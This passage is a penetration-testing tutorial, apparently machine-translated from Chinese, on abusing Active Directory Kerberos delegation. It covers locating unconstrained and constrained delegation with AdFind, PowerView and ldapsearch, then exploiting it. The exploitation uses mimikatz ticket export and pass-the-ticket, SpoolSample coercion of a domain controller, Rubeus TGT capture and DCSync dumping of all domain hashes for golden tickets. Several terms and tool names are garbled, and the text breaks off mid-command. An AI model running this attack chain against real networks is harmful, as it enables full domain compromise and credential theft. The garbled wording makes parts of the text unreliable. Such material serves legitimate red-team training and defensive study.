基于域委派的攻击

1 域委派相关定义

1.1 定义

Identity delegation is a feature of Active Directoro ry Federation Services (AD FS) that allows administrator-specified accounts to impersonate users. The account that impersonates the user is called the delete gate

This delegation capability is critical for many distributed applications for which there is a series of access control checks that must be made sequentially for each application, database, or service that is in the authorization chain for the originating request

Many real-world scenarios exist in which a Web application “front end” must retrieve data from a more secure “back end”, such as a Web service that is connected to a Microsoft SQL Server database.

Domain delegation is an application model that is often deployed in large networks, which brings great convenience to multi-hop authentication and also brings great security risks. Delegation can obtain domain administrator permissions and even create deep hidden backdoors.

Domain delegation refers to delegating the permissions of users within the domain to a service account, so that the service account can carry out in-domain activities with user rights.

information

There are two types of accounts that can be delegated in the domain:主机账户(Net Computer). The other is a service account (Net User) manually added with setspn. Whether it is non-constrained or constrained, it is an example of a host account, because the environment for delegating using a host account is easy to match and easy to understand. However, service accounts and host accounts are equivalent from the perspective of attack delegation.

Service Account (Service Account), a type of user in the domain, the account used by the server to run the service, run the service and join the domain. For example, when MS SQL Server is installed, it will automatically register the service account SqlServiceAccount within the domain. This type of account cannot be used for interactive login.

After an ordinary user jack in the domain is authenticated to the foreground WEB service through the Kerberos protocol, the service account websvc that runs the WEB service in the foreground simulates the user jack, and continues to authenticate to the background server using the Kerberos protocol, thereby obtaining the access rights of the jack user in the background server, that is, Kerberos authentication with single or multiple hops in the domain.

1.2 流程

Domain user jack authenticates with Kerberos method to access the web server;

The web service runs with the websvc service account, and websvc initiates a jack user's ticket application to KDC;

KDC checks the delegation attributes of the websvc user and, if set, returns the jack user's forwardable invoice TGT;

After websvc receives the jack user TGT, it uses the ticket to apply to KDC for the service ticket ST to access the file server;

KDC checks the delegation attributes of websvc. If set and the file service is in the allowed list, it returns an authorization ticket for jack user to access the file service ST;

After the authorization ticket ST of the jack user received by websvc, you can access the file service and complete multi-hop authentication.

1.3 委派类型

There are three main application methods for intradition within the domain :

First, non-constrained delegation (Unconstrained Delegation), the service account can obtain a user's TGT, so the service account can use the TGT, which simulates the user's access to any service.

The second is Constrained Delegation, which is Kerberos' extended protocol S4U2Proxy. The service account can only obtain the ST of a certain user, so that it can only simulate users accessing specific services.

2 非约束委派

2.1 原理

If the service account B of a service A is set to non-constrained delegation, when user C accesses service A through Kerberos authentication, KDC will check the properties of service account B. When it is found that it is a non-constrained delegation, KDC will place user C's TGT in ST. In this way, B obtains user A's TGT while verifying ST, so that user A can simulate user A's access to any service.

After delegating is enabled, there will be an additional flag in the userAccountControl property of the user: WORKSTATION_TRUSTED_FOR_DELEGATION

Settings for non-constrained delegation require the SeEnableDelegation privilege, which is usually granted only to the domain administrator.

2.2 实战

2.2.1 非约束委派的查找

2.2.1.1 adfind

查询非约束委派的主机:

AdFind.exe -b 'DC=pentest,DC=com' -f '((samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName

查询非约束委派的用户:

AdFind.exe -b 'DC=pentest,DC=com' -f '((samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName

2.2.1.2 powerview

Note: PowerSploit-dev branch

查询配置非约束委派的用户: Get-NetUser -Unconstrained -Domain pentest.com

查询配置非约束委派的主机: Get-domaincomputer -Unconstrained -Domain pentest.com

2.2.1.3 ldapsearch

information

Requires the account password of any user in the domain

查询非约束委派的机器：ldapsearch -LLL -x -H ldap://172.16.147.130:389 -D '[email protected]' -w '123456bY' -b dc=pentest,dc=com '((samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName

查询非约束委派的用户：ldapsearch -LLL -x -H ldap://172.16.147.130:389 -D '[email protected]' -w '123456' -b dc=pentest,dc=com '((samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName

2.2.2 非约束委派的利用

2.2.2.1 管理员模拟访问

information

Before the experiment, it is recommended to clear the bills in memory, mimikatz under: kerberos:purge

Simulate the administrator to call the smb service of the non-binding delegation machine: net use \\win7\c$

Go back to the non-constrained delegation machine and check the ticket (部分截图):

1

2

privilege:debug

sekualsa:tickets

TGT was intercepted, we used sekurlas:tickets /export to export the tickets

At this time, our access to domain control is denied:

Then use kerberos:ptt bill file name in mimikatz to inject the bill into memory:

Can be accessed successfully.

If you want to execute commands, you can use WinRM service to remotely connect to the domain control server:

Enter-PSSession -ComputerName DC

2.2.2.2 Spooler Printer Bug

In actual combat, it is a waste of time to simply send non-constrained delegation calls for administrators to actively connect. Therefore, the non-constrained delegation + Spooler printer service can force the specified host to connect.

Utilization Principle: Take advantage of an old but default enabled method in Windows Printing System Remote Protocol (MS-RPRN), where domain users can use the MS-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex) method to force any computer running the Spooler service to authenticate the target selected by the attacker through Kerberos or NTLM.

POC: https://github.com/leechristensen/SpoolSample

Send a request to DC's Spooler service, force it to access win7 for authentication: SpoolSample.exe DC win7

You can use Rubeus to listen for events with Event ID 4624, so that the domain control can be intercepted as soon as possible, and the login from DC is monitored every second (local administrator permission is required) TGT: Rubeus.exe monitor /interval:1 /filteruser:DC$

注: The TGT captured by Rubeus.exe is base64 encoded, but we do not need to decode. Rubeus can directly inject base64 encoded tickets into memory: Rubeus.exe ptt /ticket:base64

After obtaining TGT, after using PTT to inject the ticket into the current session, you can use dcsync to export the hash of all users in the domain control, and then use the hash of the krbtgt user to generate gold notes.

1

2

3

kerberos:ptt xxxx.kirbi

lsadump:dcsync /domain:test.local /all /csv

3 约束委派

3.1 原理

Due to the insecurity of non-constrained delegation, Microsoft introduced constrained delegation in Windows Server 2003, expanded the Kerberos protocol, and introduced S4U, where S4U supports two subprotocols: Service for User to Self (S4U2Self) and Service for User to Proxy (S4U2proxy), both of which allow services to request tickets from KDC on behalf of users. S4U2self can request Kerberos service tickets (ST) for itself; S4U2proxy can request ST of other services in the name of the user, and constrained delegation limits the scope of S4U2proxy extension.

Request process for S4U2Self and S4U2proxy (Figure from Microsoft Manual):

Steps 1-4 represent the process of S4U2Self request, and Steps 5-10 represent the process of S4U2proxy

The user makes a request to service1. The user is authenticated, but service1 does not have user authorization data. Typically, this is because authentication is verified through other means than Kerberos.

Request ST1 for accessing service1 from the KDC in the name of the user through the S4U2self extension.

KDC returns to Service1 A ST1 for user authentication Service1, which may contain user authorization data.

service1 can use authorization data in ST to satisfy the user's request and then respond to the user.

Note: Although S4U2self provides information about the user to service1, S4U2self does not allow service1 to make requests for other services on behalf of the user. At this time, it is S4U2proxy's turn to play its role.

The user makes a request to service1, which needs to access the resources on service2 as a user.

service1 requests the user to access the ST2 of service2 from the KDC in the name of the user

If the request contains a PAC, the KDC verifies the PAC by checking the PAC's signature data. If the PAC is valid or does not exist, the KDC returns ST2 to service1, but the client identity stored in the cname and crealm fields of ST2 is the user's identity, not the service1's identity.

service1 uses ST2 to send a request to service2 in the name of the user and determines that the user has been authenticated by the KDC.

service2 responds to the request in step 8.

service1 responds to the user's request in step 5.

When set to binding delegation, its userAccountControl property contains TRUSTED_TO_AUTH_FOR_DELEGATION(T2A4D), and the msDS-AllowedToDelegateTo property is set to which protocols

From this we can see that the constraint delegation does not require any active request from other users to simulate the user. When you get a user that configures a constraint delegation, you can get the permission to configure the corresponding delegation host.

3.2 实战

3.2.1 约束委派的查找

3.2.1.1 adfind

查询约束委派的主机:

AdFind.exe -b 'DC=pentest,DC=com' -f '((samAccountType=805306369)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto

查询约束委派的用户:

AdFind.exe -b 'DC=pentest,DC=com' -f '((samAccountType=805306368)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto

3.2.1.2 powerview

查询约束委派的主机:

Get-DomainComputer -TrustedToAuth -Domain test.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto

查询约束委派的用户:

Get-DomainUser –TrustedToAuth -domain qiyou.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|fl

3.2.1.3 ldapsearch

查询约束委派的机器：ldapsearch -LLL -x -H ldap://IP:389 -D '[email protected]' -w '123456' -b dc=pentest,dc=com '((samAccountType=805306369)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto

查询约束委派的用户：ldapsearch -LLL -x -H ldap://IP:389 -D '[email protected]' -w '123456' -b dc=pentest,dc=com '((samAccountType=805306368)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto

3.2.2 约束委派的利用

3.2.2.1 常见情况

It is known that in the case of constrained delegation, the service user can only obtain the service ST of a certain user or host, and can only use simulated users to access specific services, and cannot obtain the user's TGT. If you can obtain the plaintext password or hash of the user who has enabled the constrained delegation, you can forge the S4U request, and then forge the service user to access the service ST with the permissions of any account.

先抓出主机账户的 NTLM Hash 值：mimikatz.exe 'privilege:debug' 'sek